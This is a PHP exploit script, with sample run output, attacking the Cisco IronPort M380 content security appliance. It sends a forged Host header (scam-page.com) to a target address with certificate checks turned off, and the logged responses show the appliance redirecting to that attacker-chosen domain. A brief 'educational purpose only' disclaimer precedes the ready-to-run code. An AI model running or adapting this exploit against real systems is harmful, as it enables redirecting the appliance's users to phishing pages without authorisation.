<?php
//
//  Cisco Content Security Virtual Appliance M380 IronPort Remote Cross Site Host Modification Demo Exploit
//
//
//  Copyright 2019 (c) Todor Donev <todor.donev at gmail.com>
//
//
//  Disclaimer:
//  This or previous programs are for Educational purpose ONLY. Do not use it without permission. 
//  The usual disclaimer applies, especially the fact that Todor Donev is not liable for any damages 
//  caused by direct or indirect use of the  information or functionality provided by these programs. 
//  The author or any Internet provider  bears NO responsibility for content or misuse of these programs 
//  or any derivatives thereof. By using these programs you accept the fact  that any damage (dataloss, 
//  system crash, system compromise, etc.) caused by the use  of these programs are not Todor Donev's 
//  responsibility.
//   
//  Use them at your own risk!
//
//
//      [test@localhost ironport]$ php -S localhost:1337 ironport_m380.php
//  PHP <HIDDEN> Development Server started at Sun Sep  8 16:47:43 2019
//  Listening on http://localhost:1337
//  Document root is /home/test/ironport
//  Press Ctrl-C to quit.
//  * About to connect() to 192.168.1.1 port 443 (#0)
//  *   Trying 192.168.1.1... * connected
//  * Connected to 192.168.1.1 (192.168.1.1) port 443 (#0)
//  * Initializing NSS with certpath: sql:/etc/pki/nssdb
//  * skipping SSL peer certificate verification
//  * SSL connection using TLS_DHE_RSA_WITH_AES_128_GCM_SHA256
//  * Server certificate:
//  *   subject: 
//  *   start date: Mar 19 00:00:00 2018 GMT
//  *   expire date: Mar 18 23:59:59 2020 GMT
//  *   common name:   
//  *   issuer: 
//  > GET / HTTP/1.1
//  Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
//  Cache-Control: no-cache
//  Content-Type: application/x-www-form-urlencoded; charset=utf-8
//  Host: scam-page.com
//  Referer: scam-page.com
//  User-Agent: Mozilla/5.0 (X11; Ubuntu; Linux i686; rv:28.0) Gecko/20100101 Firefox/28.0
//  
//  * HTTP 1.0, assume close after body
//  < HTTP/1.0 303 Redirecting
//  < Server: glass/1.0 Python/2.6.4
//  < Date: Sun, 08 Sep 2019 13:47:59 GMT
//  < Content-Type: text/html
//  < X-Frame-Options: SAMEORIGIN
//  < Set-Cookie: sid=InCkP0xGNg7fyAqL2mAO; expires=Tuesday, 10-Sep-2019 13:47:59 GMT; httponly; Path=/; secure
//  < Cache-Control: no-store,no-cache,must-revalidate,max-age=0,post-check=0,pre-check=0
//  < Pragma: no-cache
//  < Expires: Sun, 08 Sep 2019 13:47:59 GMT
//  < Last-Modified: Sun, 08 Sep 2019 13:47:59 GMT
//  < Location: https://scam-page.com/login?CSRFKey=c17fd622-f031-f0e0-2cab-2854acb4a443&referrer=https%3A%2F%2Fscam-page.com%2FSearch
//  < 
//  * Closing connection #0
//  * About to connect() to 192.168.1.1 port 443 (#0)
//  *   Trying 192.168.1.1... * connected
//  * Connected to 192.168.1.1 (192.168.1.1) port 443 (#0)
//  * skipping SSL peer certificate verification
//  * SSL connection using TLS_DHE_RSA_WITH_AES_128_GCM_SHA256
//  * Server certificate:
//  *   subject: 
//  *   start date: Mar 19 00:00:00 2018 GMT
//  *   expire date: Mar 18 23:59:59 2020 GMT
//  *   common name:   
//  *   issuer: 
//  > GET / HTTP/1.1
//  Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
//  Cache-Control: no-cache
//  Content-Type: application/x-www-form-urlencoded; charset=utf-8
//  Host: scam-page.com
//  Referer: scam-page.com
//  User-Agent: Mozilla/5.0 (X11; Ubuntu; Linux i686; rv:28.0) Gecko/20100101 Firefox/28.0
//  
//  * HTTP 1.0, assume close after body
//  < HTTP/1.0 303 Redirecting
//  < Server: glass/1.0 Python/2.6.4
//  < Date: Sun, 08 Sep 2019 13:48:00 GMT
//  < Content-Type: text/html
//  < X-Frame-Options: SAMEORIGIN
//  < Set-Cookie: sid=NPPfo6uXJ5gPbJSPcNDE; expires=Tuesday, 10-Sep-2019 13:48:00 GMT; httponly; Path=/; secure
//  < Cache-Control: no-store,no-cache,must-revalidate,max-age=0,post-check=0,pre-check=0
//  < Pragma: no-cache
//  < Expires: Sun, 08 Sep 2019 13:48:00 GMT
//  < Last-Modified: Sun, 08 Sep 2019 13:48:00 GMT
//  < Location: https://scam-page.com/login?CSRFKey=32b0b069-34bb-1fdf-9f92-2de72a24cb65&referrer=https%3A%2F%2Fscam-page.com%2FSearch
//  < 
//  * Closing connection #0
//  


$url = "https://192.168.1.1";
$fake_host = "scam-page.com";
$ch = curl_init(); 

curl_setopt($ch, CURLOPT_URL, $url); 
curl_setopt($ch, CURLOPT_RETURNTRANSFER, 1); 
curl_setopt($ch, CURLOPT_SSL_VERIFYHOST, 0);
curl_setopt($ch, CURLOPT_SSL_VERIFYPEER, 0);
curl_setopt($ch, CURLOPT_VERBOSE, true);
$headers = [
    'Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8',
    'Cache-Control: public',
    'Content-Type: application/x-www-form-urlencoded; charset=utf-8',
    'Host: '.$fake_host,
    'Referer: '.$fake_host, 
    'User-Agent: Mozilla/5.0 (X11; Ubuntu; Linux i686; rv:28.0) Gecko/20100101 Firefox/28.0',
];
curl_setopt($ch, CURLOPT_HTTPHEADER, $headers);
$output = curl_exec($ch); 
curl_close($ch);
echo $output;